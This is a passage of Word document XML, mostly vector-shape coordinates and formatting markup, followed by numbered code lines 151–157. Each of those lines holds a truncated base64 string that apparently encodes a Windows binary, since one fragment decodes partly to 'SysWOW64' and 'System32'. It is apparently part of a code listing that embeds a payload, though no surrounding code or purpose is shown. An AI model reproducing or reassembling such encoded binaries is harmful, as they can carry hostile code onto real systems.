2717,14265,2719,14265,2722,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14265,2724,14266,2724,14266,2724,14266,2724,14266,2724,14266,2724,14266,2724,14266,2724,14266,2724,14267,2724,14267,2724,14267,2724,14267,2724,14268,2724,14268,2724,14268,2724,14269,2724,14269,2724,14269,2724,14270,2724,14270,2724,14271,2724,14271,2724,14272,2724,14272,2724,14273,2724,14273,2724,14274,2724,14275,2724,14275,2724,14276,2724,14277,2724,14278,2724,14279,2724,14280,2724,14280,2724,14281,2724,14282,2724,14283,2724,14285,2724,14286,2724,14287,2724,14288,2724,14289,2724,14291,2724,14292,2724,14293,2724,14295,2724,14296,2724,14298,2724,14299,2724,14301,2724,14303,2724,14304,2724,14306,2724,14308,2724,14310,2724,14312,2724,14314,2724,14316,2724,14318,2724,14320,2724,14322,2724,14325,2724,14327,2724,14330,2724,14332,2724,14335,2724,14337,2724,14340,2724,14343,2724,14345,2724,14348,2724,14351,2724,14354,2724,14357,2724,14360,2724,14364,2724,14367,2724,14370,2724,14374,2724,14377,2724,14381,2724,14384,2724,14388,2724,14392,2724,14396,2724,14400,2724,14404,2724,14408,2724,14412,2724,14416,2724,14421,2724,14425,2724,14430,2724,14434,2724,14439,2724,14444,2724,14449,2724,14454,2724,14459,2724,14464,2724,14469,2724,14475,2724,14480,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2724,14486,2723,14486,2723,14486,2723,14486,2723,14486,2723,14486,2723,14486,2723,14486,2722,14486,2722,14486,2722,14486,2722,14486,2722,14486,2722,14486,2721,14486,2721,14486,2721,14486,2721,14486,2720,14486,2720,14486,2720,14486,2719,14486,2719,14486,2719,14486,2718,14486,2718,14486,2717,14486,2717,14486,2716,14486,2716,14486,2716,14486,2715,14486,2714,14486,2714,14486,2713,14486,2713,14486,2712,14486,2712,14486,2711,14486,2710,14486,2709,14486,2709,14486,2708,14486,2707,14486,2706,14486,2706,14486,2705,14486,2704,14486,2703,14486,2702,14486,2701,14486,2700,14486,2699,14486,2698,14486,2697,14486,2696,14486,2695,14486,2694,14486,2693,14486,2691,14486,2690,14486,2689,14486,2688,14486,2686,14486,2685,14486,2684,14486,2682,14486,2681,14486,2679,14486,2678,14486,2676,14486,2675,14486,2673,14486,2671,14486,2670,14486,2668,14486,2666,14486,2664,14486,2663,14486,2661,14486,2659,14486,2657,14486,2655,14486,2653,14486,2651,14486,2649,14486,2647,14486,2644,14486,2642,14486,2640,14486,2638,14486,2635,14486,2633,14486,2631,14486,2628,14486,2626,14486,2623,14486,2620,14486,2620,14486,2620,14486,2620,14486,2620,14486,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14485,2620,14484,2620,14484,2620,14484,2620,14484,2620,14484,2620,14483,2620,14483,2620,14483,2620,14483,2620,14482,2620,14482,2620,14482,2620,14481,2620,14481,2620,14480,2620,14480,2620,14479,2620,14479,2620,14478,2620,14478,2620,14477,2620,14476,2620,14476,2620,14475,2620,14474,2620,14474,2620,14473,2620,14472,2620,14471,2620,14470,2620,14469,2620,14468,2620,14467,2620,14466,2620,14465,2620,14464,2620,14463,2620,14461,2620,14460,2620,14459,2620,14457,2620,14456,2620,14454,2620,14453,2620,14451,2620,14450,2620,14448,2620,14446,2620,14444,2620,14443,2620,14441,2620,14439,2620,14437,2620,14435,2620,14432,2620,14430,2620,14428,2620,14426,2620,14423,2620,14421,2620,14419,2620,14416,2620,14413,2620,14411,2620,14408,2620,14405,2620,14402,2620,14399,2620,14396,2620,14393,2620,14390,2620,14387,2620,14384,2620,14380,2620,14377,2620,14373,2620,14370,2620,14366,2620,14362,2620,14359,2620,14355,2620,14351,2620,14347,2620,14343,2620,14338,2620,14334,2620,14330,2620,14325,2620,14321,2620,14316,2620,14311,2620,14307,2620,14302,2620,14297,2620,14292,2620,14287,2620,14281,2620,14276,2620,14271,2620,14265e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:109.500pt;margin-top:740.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2190,14810" coordsize="110,230">
        <v:shape style="position:absolute;left:2190;top:14810;width:110;height:230" coordorigin="2190,14810" coordsize="110,230" path="m2205,14823l2205,14823,2205,14823,2205,14823,2205,14823,2205,14823,2205,14823,2205,14823,2205,14823,2205,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2206,14823,2207,14823,2207,14823,2207,14823,2207,14823,2207,14823,2207,14823,2207,14823,2208,14823,2208,14823,2208,14823,2208,14823,2209,14823,2209,14823,2209,14823,2209,14823,2210,14823,2210,14823,2210,14823,2211,14823,2211,14823,2211,14823,2212,14823,2212,14823,2213,14823,2213,14823,2214,14823,2214,14823,2215,14823,2215,14823,2216,14823,2216,14823,2217,14823,2217,14823,2218,14823,2219,14823,2219,14823,2220,14823,2221,14823,2222,14823,2222,14823,2223,14823,2224,14823,2225,14823,2226,14823,2227,14823,2227,14823,2228,14823,2229,14823,2230,14823,2231,14823,2232,14823,2234,14823,2235,14823,2236,14823,2237,14823,2238,14823,2239,14823,2241,14823,2242,14823,2243,14823,2245,14823,2246,14823,2247,14823,2249,14823,2250,14823,2252,14823,2253,14823,2255,14823,2257,14823,2258,14823,2260,14823,2262,14823,2263,14823,2265,14823,2267,14823,2269,14823,2271,14823,2273,14823,2275,14823,2277,14823,2279,14823,2281,14823,2283,14823,2285,14823,2287,14823,2290,14823,2292,14823,2294,14823,2297,14823,2299,14823,2302,14823,2304,14823,2307,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14823,2309,14824,2309,14824,2309,14824,2309,14824,2309,14824,2309,14824,2309,14825,2309,14825,2309,14825,2309,14826,2309,14826,2309,14826,2309,14827,2309,14827,2309,14827,2309,14828,2309,14828,2309,14829,2309,14829,2309,14830,2309,14830,2309,14831,2309,14832,2309,14832,2309,14833,2309,14834,2309,14835,2309,14835,2309,14836,2309,14837,2309,14838,2309,14839,2309,14840,2309,14841,2309,14842,2309,14843,2309,14844,2309,14846,2309,14847,2309,14848,2309,14850,2309,14851,2309,14852,2309,14854,2309,14855,2309,14857,2309,14859,2309,14860,2309,14862,2309,14864,2309,14866,2309,14868,2309,14869,2309,14871,2309,14874,2309,14876,2309,14878,2309,14880,2309,14882,2309,14885,2309,14887,2309,14890,2309,14892,2309,14895,2309,14897,2309,14900,2309,14903,2309,14906,2309,14909,2309,14912,2309,14915,2309,14918,2309,14921,2309,14925,2309,14928,2309,14931,2309,14935,2309,14938,2309,14942,2309,14946,2309,14950,2309,14953,2309,14957,2309,14961,2309,14966,2309,14970,2309,14974,2309,14978,2309,14983,2309,14987,2309,14992,2309,14997,2309,15002,2309,15006,2309,15011,2309,15016,2309,15022,2309,15027,2309,15032,2309,15038,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2309,15043,2308,15043,2308,15043,2308,15043,2308,15043,2308,15043,2308,15043,2308,15043,2308,15043,2307,15043,2307,15043,2307,15043,2307,15043,2307,15043,2306,15043,2306,15043,2306,15043,2306,15043,2305,15043,2305,15043,2305,15043,2304,15043,2304,15043,2304,15043,2303,15043,2303,15043,2302,15043,2302,15043,2302,15043,2301,15043,2301,15043,2300,15043,2300,15043,2299,15043,2298,15043,2298,15043,2297,15043,2297,15043,2296,15043,2295,15043,2295,15043,2294,15043,2293,15043,2292,15043,2292,15043,2291,15043,2290,15043,2289,15043,2288,15043,2287,15043,2286,15043,2285,15043,2284,15043,2283,15043,2282,15043,2281,15043,2280,15043,2279,15043,2278,15043,2276,15043,2275,15043,2274,15043,2273,15043,2271,15043,2270,15043,2269,15043,2267,15043,2266,15043,2264,15043,2263,15043,2261,15043,2260,15043,2258,15043,2256,15043,2255,15043,2253,15043,2251,15043,2249,15043,2248,15043,2246,15043,2244,15043,2242,15043,2240,15043,2238,15043,2236,15043,2234,15043,2232,15043,2229,15043,2227,15043,2225,15043,2223,15043,2220,15043,2218,15043,2216,15043,2213,15043,2211,15043,2208,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15043,2205,15042,2205,15042,2205,15042,2205,15042,2205,15042,2205,15042,2205,15042,2205,15041,2205,15041,2205,15041,2205,15041,2205,15040,2205,15040,2205,15040,2205,15039,2205,15039,2205,15038,2205,15038,2205,15037,2205,15037,2205,15036,2205,15036,2205,15035,2205,15035,2205,15034,2205,15033,2205,15033,2205,15032,2205,15031,2205,15030,2205,15030,2205,15029,2205,15028,2205,15027,2205,15026,2205,15025,2205,15024,2205,15023,2205,15021,2205,15020,2205,15019,2205,15018,2205,15016,2205,15015,2205,15013,2205,15012,2205,15010,2205,15009,2205,15007,2205,15005,2205,15004,2205,15002,2205,15000,2205,14998,2205,14996,2205,14994,2205,14992,2205,14990,2205,14988,2205,14986,2205,14983,2205,14981,2205,14979,2205,14976,2205,14974,2205,14971,2205,14968,2205,14966,2205,14963,2205,14960,2205,14957,2205,14954,2205,14951,2205,14948,2205,14945,2205,14941,2205,14938,2205,14934,2205,14931,2205,14927,2205,14924,2205,14920,2205,14916,2205,14912,2205,14908,2205,14904,2205,14900,2205,14896,2205,14892,2205,14887,2205,14883,2205,14878,2205,14874,2205,14869,2205,14864,2205,14859,2205,14854,2205,14849,2205,14844,2205,14839,2205,14834,2205,14828,2205,14823e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:130.500pt;margin-top:740.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2610,14810" coordsize="110,230">
        <v:shape style="position:absolute;left:2610;top:14810;width:110;height:230" coordorigin="2610,14810" coordsize="110,230" path="m2620,14823l2620,14823,2620,14823,2620,14823,2620,14823,2620,14823,2620,14823,2620,14823,2620,14823,2620,14823,2620,14823,2620,14823,2620,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2621,14823,2622,14823,2622,14823,2622,14823,2622,14823,2622,14823,2622,14823,2623,14823,2623,14823,2623,14823,2623,14823,2624,14823,2624,14823,2624,14823,2624,14823,2625,14823,2625,14823,2625,14823,2626,14823,2626,14823,2626,14823,2627,14823,2627,14823,2628,14823,2628,14823,2629,14823,2629,14823,2630,14823,2630,14823,2631,14823,2631,14823,2632,14823,2632,14823,2633,14823,2634,14823,2634,14823,2635,14823,2636,14823,2637,14823,2637,14823,2638,14823,2639,14823,2640,14823,2641,14823,2642,14823,2642,14823,2643,14823,2644,14823,2645,14823,2646,14823,2647,14823,2649,14823,2650,14823,2651,14823,2652,14823,2653,14823,2654,14823,2656,14823,2657,14823,2658,14823,2660,14823,2661,14823,2662,14823,2664,14823,2665,14823,2667,14823,2668,14823,2670,14823,2672,14823,2673,14823,2675,14823,2677,14823,2678,14823,2680,14823,2682,14823,2684,14823,2686,14823,2688,14823,2690,14823,2692,14823,2694,14823,2696,14823,2698,14823,2700,14823,2702,14823,2705,14823,2707,14823,2709,14823,2712,14823,2714,14823,2717,14823,2719,14823,2722,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14823,2724,14824,2724,14824,2724,14824,2724,14824,2724,14824,2724,14824,2724,14825,2724,14825,2724,14825,2724,14826,2724,14826,2724,14826,2724,14827,2724,14827,2724,14827,2724,14828,2724,14828,2724,14829,2724,14829,2724,14830,2724,14830,2724,14831,2724,14832,2724,14832,2724,14833,2724,14834,2724,14835,2724,14835,2724,14836,2724,14837,2724,14838,2724,14839,2724,14840,2724,14841,2724,14842,2724,14843,2724,14844,2724,14846,2724,14847,2724,14848,2724,14850,2724,14851,2724,14852,2724,14854,2724,14855,2724,14857,2724,14859,2724,14860,2724,14862,2724,14864,2724,14866,2724,14868,2724,14869,2724,14871,2724,14874,2724,14876,2724,14878,2724,14880,2724,14882,2724,14885,2724,14887,2724,14890,2724,14892,2724,14895,2724,14897,2724,14900,2724,14903,2724,14906,2724,14909,2724,14912,2724,14915,2724,14918,2724,14921,2724,14925,2724,14928,2724,14931,2724,14935,2724,14938,2724,14942,2724,14946,2724,14950,2724,14953,2724,14957,2724,14961,2724,14966,2724,14970,2724,14974,2724,14978,2724,14983,2724,14987,2724,14992,2724,14997,2724,15002,2724,15006,2724,15011,2724,15016,2724,15022,2724,15027,2724,15032,2724,15038,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2723,15043,2723,15043,2723,15043,2723,15043,2723,15043,2723,15043,2723,15043,2722,15043,2722,15043,2722,15043,2722,15043,2722,15043,2722,15043,2721,15043,2721,15043,2721,15043,2721,15043,2720,15043,2720,15043,2720,15043,2719,15043,2719,15043,2719,15043,2718,15043,2718,15043,2717,15043,2717,15043,2716,15043,2716,15043,2716,15043,2715,15043,2714,15043,2714,15043,2713,15043,2713,15043,2712,15043,2712,15043,2711,15043,2710,15043,2709,15043,2709,15043,2708,15043,2707,15043,2706,15043,2706,15043,2705,15043,2704,15043,2703,15043,2702,15043,2701,15043,2700,15043,2699,15043,2698,15043,2697,15043,2696,15043,2695,15043,2694,15043,2693,15043,2691,15043,2690,15043,2689,15043,2688,15043,2686,15043,2685,15043,2684,15043,2682,15043,2681,15043,2679,15043,2678,15043,2676,15043,2675,15043,2673,15043,2671,15043,2670,15043,2668,15043,2666,15043,2664,15043,2663,15043,2661,15043,2659,15043,2657,15043,2655,15043,2653,15043,2651,15043,2649,15043,2647,15043,2644,15043,2642,15043,2640,15043,2638,15043,2635,15043,2633,15043,2631,15043,2628,15043,2626,15043,2623,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15042,2620,15042,2620,15042,2620,15042,2620,15042,2620,15042,2620,15042,2620,15041,2620,15041,2620,15041,2620,15041,2620,15040,2620,15040,2620,15040,2620,15039,2620,15039,2620,15038,2620,15038,2620,15037,2620,15037,2620,15036,2620,15036,2620,15035,2620,15035,2620,15034,2620,15033,2620,15033,2620,15032,2620,15031,2620,15030,2620,15030,2620,15029,2620,15028,2620,15027,2620,15026,2620,15025,2620,15024,2620,15023,2620,15021,2620,15020,2620,15019,2620,15018,2620,15016,2620,15015,2620,15013,2620,15012,2620,15010,2620,15009,2620,15007,2620,15005,2620,15004,2620,15002,2620,15000,2620,14998,2620,14996,2620,14994,2620,14992,2620,14990,2620,14988,2620,14986,2620,14983,2620,14981,2620,14979,2620,14976,2620,14974,2620,14971,2620,14968,2620,14966,2620,14963,2620,14960,2620,14957,2620,14954,2620,14951,2620,14948,2620,14945,2620,14941,2620,14938,2620,14934,2620,14931,2620,14927,2620,14924,2620,14920,2620,14916,2620,14912,2620,14908,2620,14904,2620,14900,2620,14896,2620,14892,2620,14887,2620,14883,2620,14878,2620,14874,2620,14869,2620,14864,2620,14859,2620,14854,2620,14849,2620,14844,2620,14839,2620,14834,2620,14828,2620,14823e x" fillcolor="#fefefe" stroke="f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68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65" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>151</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AE8AVwA2ADQAXAAAFVwAUwB5AHMAdABlAG0AMwAyAFwAAAMwAAAARY+bzuLqxE+aSSAzLsphX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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>E"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>152</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"IAEBCAMgAAEFIAEBEREEIAEBDgQgAQECDgcJHQUYEhwREA4YGAgYBQABHQUOBAABDg4DIAAIB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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>D"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>153</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"Dg4ODgIGGAMgAA4FAAICDg4EAAEIHAi3elxWGTTgiQQBAAAABAIAAAAEBAAAAAQIAAAABBAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>E"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>154</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"IAAAAARAAAAABIAAAAAEAAEAAAQAAgAABAAEAAAEAAgAAAQAEAAABAAgAAAEAEAAAAQAgAAAB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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>155</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AQAEAAACAAQAAAQABAAACAAEAAAQAAQAACAABAAAAAEEAAAAAgQAAAAEBAAAAAgEAAAAEAQAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>g"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>156</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"BAAAAEAEAAAAgAQAMAAABAAAQAACBggCBgICBgkDBhEUAwYRGAIGBgMGESADBhEkEwAKGA4OE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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>S"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>157</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
